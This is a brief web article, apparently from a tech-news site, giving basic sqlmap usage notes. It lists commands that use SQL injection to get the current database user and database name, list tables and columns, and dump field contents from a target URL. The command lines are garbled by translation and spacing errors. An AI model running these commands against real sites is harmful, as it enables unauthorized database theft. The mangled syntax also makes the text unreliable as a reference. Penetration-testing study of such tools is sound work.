Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Sqlmap usage Notes (fundamentals)

2025-01-18 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Share

Shulou(Shulou.com)06/01 Report--

Basic steps:

Sqlmap-u "http://url/news?id=1"-- current-user # gets the current user name

Sqlmap-u "http://www.xxoo.com/news?id=1"-- current-db # gets the current database name sqlmap-u" http://www.xxoo.com/news?id=1"-- tables-D "db_name" # list name

Sqlmap-u "http://url/news?id=1"-- columns-T" tablename "users-D" db_name "- v column fields sqlmap-u" http://url/news?id=1"-- dump-C "column_name"-T "table_name"-D "db_name"-v fields get field contents

This is almost all in the daily operation. For more information, you can search "sqlmap usage Notes" in Baidu Library.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Network Security

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report